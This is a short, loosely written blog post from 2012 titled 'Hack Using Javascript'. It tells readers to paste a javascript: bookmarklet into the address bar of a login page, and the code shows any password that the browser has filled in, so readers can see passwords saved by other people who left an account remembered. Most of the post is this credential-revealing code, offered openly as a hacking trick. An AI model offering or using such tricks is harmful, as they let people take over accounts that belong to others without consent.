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Saturday 10 March 2012

Hack Using Javascript

hi frinedz.. many users forget to logout and they also tick ramember me option so thats way when login page open than password written in JavaScript so we not read it so now do this open login page and put this code after url of that page and hit enter u can see that passeord

javascript:(function() {var%20s,F,j,f,i;%20s%20=%20%22%22; %20F%20=%20document.forms;%20for(j=0;%20j<F.length;%20++j) %20{%20f%20=%20F[j];%20for%20(i=0;%20i<f.length;%20++i) %20{%20if%20(f[i].type.toLowerCase()%20==%20%22password%22) %20s%20+=%20f[i].value%20+%20%22 %22;%20}%20}%20if %20(s)%20alert(%22This Trick is Exclusively shared by %20This Page:%22%20+%20s);%20else%20alert(%22There%20are %20no%20passwords%20in%20forms%20on%20this %20page.%22);})();

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